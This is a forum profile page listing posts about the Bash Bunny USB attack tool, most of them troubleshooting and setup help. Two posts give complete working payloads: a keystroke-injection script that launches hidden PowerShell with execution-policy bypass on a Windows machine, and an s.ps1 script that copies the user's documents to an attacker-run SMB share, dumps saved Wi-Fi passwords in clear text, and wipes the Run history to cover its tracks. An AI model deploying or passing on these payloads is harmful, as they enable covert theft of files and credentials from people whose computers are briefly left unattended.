Jump to content

jblk01

Active Members
  • Posts

    35
  • Joined

  • Last visited

Everything posted by jblk01

  1. Is it possible that a data line isn't making good contact but the 5V line for power is?
  2. @HD3 what about 'lsblk' and 'lsusb' ? If it's still not detected, try running 'sudo dmesg -w' and then plugging in the Bunny in arming mode. I'd also try running this command too: 'sudo screen /dev/ttyACM0 115200'
  3. Now you can involuntary backup more of the targets data by writing to the microSD card instead of the internal storage. Prerequisite: SSH or serial into your Bunny MK2 and do the following: 'timedatectl set-time' followed by the current year, month and date. Run: 'apt update ; apt install gcc' 'cd /tools' 'wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz' 'tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/' 'rm -f impacket-0.9.19.tar.gz' 'cd impacket' 'pip install -r requirements.txt' 'cd ../' 'mkdir tmp' 'cd tmp' 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/' 'rm -rf tmp/' 'cd impacket/ && python setup.py install' Now on your microSD card, create the following directory structure: /smb |___loot/ |___s.ps1 Copy the following payload.txt into either switch 1 or switch 2: ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Mound SD as udisk udisk mount ######## ETHERNET STAGE ######## LED STAGE1 # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /root/udisk/smb >> /root/udisk/smb/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET Q GUI r Q DELAY 500 Q STRING cmd /C \"start /b powershell -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /root/udisk/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /root/udisk/smb/EXFILTRATION_COMPLETE # Sync file system sync # Unmount the SD card udisk unmount ######## FINISH ######## # Trap is clean sync LED FINISH shutdown 0 Finally here is the s.ps1: $exfil_dir="$Env:UserProfile\Downloads" $exfil_dir1="$Env:UserProfile\Documents" $exfil_dir2="$Env:UserProfile\Desktop" $exfil_ext="*.doc*" $exfil_ext1="*.pdf*" $exfil_ext2="*.xls*" $exfil_ext3="*.ppt*" $loot_dir="\\172.16.64.1\s\loot\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" mkdir $loot_dir robocopy $exfil_dir $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z robocopy $exfil_dir1 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z robocopy $exfil_dir2 $loot_dir $exfil_ext $exfil_ext1 $exfil_ext2 $exfil_ext3 /E /MT /Z (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$loot_dir\$env:UserName".txt" New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE" Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue Now, eject the microSD card, insert into your Bunny MK2, move the switch to the one where the payload.txt is placed and insert it into a Windows 10 machine. If done correctly, it should exfiltrate all files specified in the s.ps1 script to the microSD card. 🙂
  4. Hi @KinderRiegel, I was seeing the same error as you and i found a workaround: Make sure your internet connection is shared with the Bunny. Then on the Bunny: First, do 'timedatectl set-time' followed by the current year, month and date. Then, go into the /tools/impacket/ directory and run 'pip install -r requirements.txt'. For me, this failed on a few requirements so I had to go in and: 'pip2 install setuptools-rust' 'pip2 install cryptography' 'wget https://files.pythonhosted.org/packages/80/ee/13ca9a479a7e268a2e77edbc1ef1d8876c37f254f43272f4ce9180d888b0/pyasn1-0.4.8-py2.7.egg && easy_install *.egg' 'rm -f pyans1-0.4.8-py2.7.egg' 'wget https://files.pythonhosted.org/packages/82/e2/a0f9f5452a59bafaa3420585f22b58a8566c4717a88c139af2276bb5695d/pycryptodomex-3.10.1.tar.gz' 'tar -xzvf pycryptodomex-3.10.1.tar.gz' 'cd pycryptodomex-2.10.1 && python setup.py install' 'cd /tools/impacket/ && python setup.py install' And from there it was working properly. 🙂
  5. Thank you @Jtyle6, does that mean that the /payloads/library/ directory is no longer exposed to the Windows (or whatever OS) machine when using "ATTACKMODE STORAGE" ?
  6. I've re-read the docs regarding the Mark2 and I'm still confused. Does my switch1 and switch2 directories need to be on the internal storage or the SD card? Also, can I have only the microSD card be presented to the host machine for loot to be written to and the payloads executed from the internal Bunny storage, so that Windows Defender doesn't zap my payloads library? If anyone can give some example payloads so that I can grasp it I'd be most grateful.
  7. Hey @joeservo, sorry that I'm late. I realized that I partially rewrote the script and didn't share it here, I apologize for that. Here it is for both you and others if need be: #!/bin/bash # # Title: Faster SMB Exfiltrator version 2.0 # Author: Hak5Darren # Props: ImNatho, mike111b, madbuda, jblk01 # Version: 1.6.1 # Category: Exfiltration # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Ethernet # # REQUIREMENTS # ============ # SETUP: # # 1. apt update ; apt install gcc # 2. pip install impacket # 3. cd /tools/ # 4. wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz # 5. tar -xzvf impacket-0.9.19.tar.gz ; mv -v impacket-0.9.19/ impacket/ # # # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE1......Ethernet Stage # STAGE2......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE1 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -username user -password Password01 -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 GET HOST_IP LED STAGE2 ATTACKMODE HID RNDIS_ETHERNET RUN WIN powershell Q DELAY 1000 Q STRING powershell -windowstyle hidden -exec bypass "net use \\\\$HOST_IP\\s /u:user Password01; powershell -windowstyle hidden -exec bypass \\\\$HOST_IP\\s\\s.ps1; exit" Q DELAY 500 Q ENTER LED SPECIAL # Wait until files are done copying while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH
  8. I know it can do keystroke injection, but what about things the Bunny can do? Such as pretending to be a second network adapter, give the target a second IP address and then run an nmap scan against the target? Edit: I just saw it has Ethernet, Serial etc. on the product page. Never mind. 🙂
  9. It's available here but doesn't seem to be listed on the Essentials Field Kit page. Any thoughts @Darren Kitchen?
  10. @Geesknees - Try to access the BB via SSH or Serial. If you wish to use SSH (my preferred method) then create a payload.txt file in either the switch1 directory or the switch2 directory and enter this: LED M FAST ATTACKMODE AUTO_ETHERNET Save the file, remove the Bunny and then reinsert it using whichever switch directory you used. Then ssh into it: ssh -l root 172.16.64.1 Password is: hak5bunny Then run: 'udisk unmount' and then run 'udisk reformat'. This should remove all of the old files on the user accessable partition.
  11. @Foxtrot - As per my pull request on Github, I had to use a newer release of Impacket to achieve setting a username / password combo for the SMB server in my smb_exfiltrator v2 payload. Would you consider updating the .deb file here with the latest release of Impacket?
  12. @WV09 - I'm glad it works for you! My first time modifying a payload to that degree, so I was worried it might fail. I hope they add it to the main repo too.
  13. REM Play the Imperial March STRING while ($true) { ENTER STRING [console]::beep(440,500);[console]::beep(440,500);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(659,500);[console]::beep(698,350);[console]::beep(523,150);[console]::beep(415,500);[console]::beep(349,350);[console]::beep(523,150);[console]::beep(440,1000); ENTER STRING } ENTER Done 🙂
  14. Okay, I got it working on my machine so that Windows does not complain. Here is my pull request: https://github.com/hak5/bashbunny-payloads/pull/392 And the files are here: https://github.com/jblk01/bashbunny-payloads/tree/master/payloads/library/exfiltration/smb_exfiltratorV2.0
  15. @WV09 - I have updates. I factory reset my Bunny, then I installed the latest firmware (1.6). From there I did the following: You should now see a '-username' and a '-password' option. Setting these in the payload.txt along with telling Windows to authenticate with it via NET USE should make this work. I am now on my way to get my Windows 10 machine from my friend's place. I'll keep you posted.
  16. @WV09 - Try my modified version. It works correctly on both Bash Bunnies I own. I also added SMB ver. 2 support as well as slightly changed the LED pattern to suite my tastes. I even added extra file types in the s.ps1 file and I can share those if you'd like. 🙂 https://github.com/jblk01/bashbunny-payloads/blob/master/payloads/library/exfiltration/smb_exfiltrator/payload.txt
  17. Found a unique payload setup HERE. However I have read that moving the switch while the bunny is powered was dangerous, so would using this payload damage anything?
  18. Saw this cartoon drawing of the Bash Bunny on Twitter, and I've seen similar drawings of the LAN Turtle, Pineapple etc. Where can we find these? They would make awesome wallpapers!
  19. My mistake, I saw the reviews of the BB online and all photos came with a cable. It's not a big deal as one is $5 but I was just curious. Thanks for the links Darren.
  20. Grab the Impacket DEB file here, copy it to the /tools directory while in arming mode. Unplug and then replug the device in arming mode and it will be automatically installed. Also, I had to modify the payload.txt script because the attack would fail halfway through. Using my modification should work, as it works for both of my Bunnies unlike the payload.txt hosted on the Github page. Tools: My SMB exfiltrator script fix. If one can maybe improve it I'd be grateful:
  21. @skitz0 I did this and got the same result, however both my inject.bin works and I am able to store files on the microSD card. Is it supposed to flash green and red? Everything seems to work fine. Any issues after your last post?
  22. Same as the title says, if one is using the Twin Duck firmware, do you need to take out the microSD card, and hook it into an adapter in order to copy a new inject.bin file? Also, can one use this to store say a PDF, then hide the inject.bin so that you can seem innocent by asking someone to print off a PDF for you?
  23. I have ordered two Bash Bunnies so far, and the only thing inside the red packet is 1x Bash Bunny along with a card and Hak5 logo stickers. Did they stop including the cable and the BB logo stickers in the package?
  24. Try doing the three times as before, but all while in arming mode (switch closest to the USB part). But, instead of plugging it into a computer on the fourth try, I would suggest plugging it into a wall outlet using a block for smartphones. I can't remember the official name of them, the thing you charge a smarphone with that has a USB port on it. Let it sit with the police LED and don't unplug it until it starts pulsing blue with no red.
×
×
  • Create New...